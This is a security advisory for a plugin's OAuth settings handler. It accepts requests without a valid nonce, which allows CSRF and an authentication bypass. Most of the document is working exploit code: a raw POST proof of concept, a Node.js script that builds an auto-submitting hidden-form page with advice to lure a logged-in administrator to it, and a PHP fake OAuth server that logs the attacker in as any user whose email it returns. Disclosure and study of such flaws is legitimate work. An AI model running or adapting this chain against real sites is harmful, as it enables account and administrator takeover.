The plugin is affected by a Broken Access Control / Cross-Site Request Forgery (CSRF) vulnerability in its OAuth configuration handler: the settings request is accepted without a valid nonce (note the placeholder nonce value in the Proof of Concept below), so a forged request issued from a logged-in administrator's browser can be used to modify the OAuth server endpoints. Once the authorization, token and userinfo endpoints point at an attacker-controlled server, the result is an Authentication Bypass: the attacker logs in as whichever local user has the email address returned by the fake userinfo endpoint, so all that is needed to take over an account is the victim's email address. If the email address known to the attacker belongs to an administrator, the attacker is given an administrative role on the client's website.
Proof of Concept
POST / HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=oauthconfig&OAuthConfig_nonce=-&oauthservers=Custom_OAuth&client_id=-&client_secret=-&rquest_in_body=1&client_authorization=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fauth%3D1&client_token_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Ftoken%3D1&client_userinfo_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fresource%3D1
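The request above has to be issued from the victim administrator's browser, with their session cookies attached, for the plugin to accept it. The following is an added example, not part of the original advisory: a small Node.js script that generates the attacker-hosted HTML page delivering that CSRF request through an auto-submitting hidden form. The target site (http://localhost/) and the location of the attacker's script (http://localhost/oauth-exploit.php) are taken from the PoC request and are assumptions for a lab setup; the function and variable names are this example's own.

```javascript
// Added example (not from the original advisory): builds the attacker-hosted
// page that delivers the CSRF request from the Proof of Concept. When a
// logged-in administrator of the target site opens it, the browser submits the
// hidden form and the plugin's settings handler receives the same POST body
// shown in the advisory, with the victim's cookies attached.
//
// Assumed lab values (taken from the PoC request, not stated as fixed by the
// advisory): the victim site is served at http://localhost/ and the attacker's
// oauth-exploit.php is reachable at http://localhost/oauth-exploit.php.
const TARGET = "http://localhost/";
const EXPLOIT = "http://localhost/oauth-exploit.php";

// The fields of the PoC request, in the same order. The nonce is a dummy value
// because the handler does not verify it; client_id / client_secret are dummies
// because the token endpoint they would be sent to is the attacker's own script.
function pocParams(exploit = EXPLOIT) {
  return {
    action: "oauthconfig",
    OAuthConfig_nonce: "-",
    oauthservers: "Custom_OAuth",
    client_id: "-",
    client_secret: "-",
    rquest_in_body: "1",
    client_authorization: exploit + "?auth=1",
    client_token_endpoint: exploit + "?token=1",
    client_userinfo_endpoint: exploit + "?resource=1",
  };
}

// application/x-www-form-urlencoded body exactly as the browser will send it,
// useful for checking the generated form against the PoC body.
function encodeBody(params) {
  return new URLSearchParams(params).toString();
}

// Escape attribute values so the endpoint URLs cannot break out of the markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// The page the victim has to open. Hidden inputs keep the PoC parameter order;
// the inline script submits the form as soon as the page has loaded.
function buildCsrfPage(target = TARGET, params = pocParams()) {
  const inputs = Object.entries(params)
    .map(([k, v]) =>
      `    <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join("\n");
  return [
    "<!doctype html>",
    "<html><body>",
    `  <form id="f" method="POST" action="${escapeHtml(target)}">`,
    inputs,
    "  </form>",
    "  <script>document.getElementById('f').submit();</script>",
    "</body></html>",
    "",
  ].join("\n");
}

// Usage: node csrf-page.js > index.html, then host index.html and get the
// administrator to open it while logged in to the target site.
if (typeof require !== "undefined" && require.main === module) {
  process.stdout.write(buildCsrfPage());
}
```

Because the plugin accepts the request with a placeholder nonce, nothing in the page needs to be fetched from the target site first; the only requirement is that the victim's browser sends its session cookie with the cross-site POST, which depends on the cookie's SameSite attribute.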
With oauth-exploit.php, hosted on the attacker-controlled server that the three endpoint parameters above point to, containing:
<?php
/**
 * oauth-exploit.php: a fake OAuth server. Which endpoint is served is selected by
 * the query string that the CSRF request configured (auth=1, token=1, resource=1).
 */

/** auth endpoint: the plugin redirects the user here; send them straight back with a dummy code */
if ( isset( $_GET['auth'] ) ) {
    if ( isset( $_GET['response_type'] ) ) {
        if ( 'code' == $_GET['response_type'] ) {
            header( 'Location: ' . $_GET['redirect_uri'] . '/?' . http_build_query( array(
                'code' => '-', // can be anything, just don't be empty
            ) ) );
            exit;
        }
    }
}

/** token endpoint: the plugin exchanges the code here; any non-empty token is accepted */
if ( isset( $_GET['token'] ) ) {
    if ( isset( $_POST['grant_type'] ) ) {
        header( 'Content-Type: application/json' );
        echo json_encode( array(
            'access_token' => '-', // can be anything, just don't be empty
        ) );
        exit;
    }
}

/** resource (userinfo) endpoint: the email returned here selects the account the plugin logs in as */
if ( isset( $_GET['resource'] ) ) {
    header( 'Content-Type: application/json' );
    echo json_encode( array(
        'email'      => '[email protected]', // email address of the user to impersonate
        'user_login' => '-', // can be anything, just don't be empty
    ) );
    exit;
}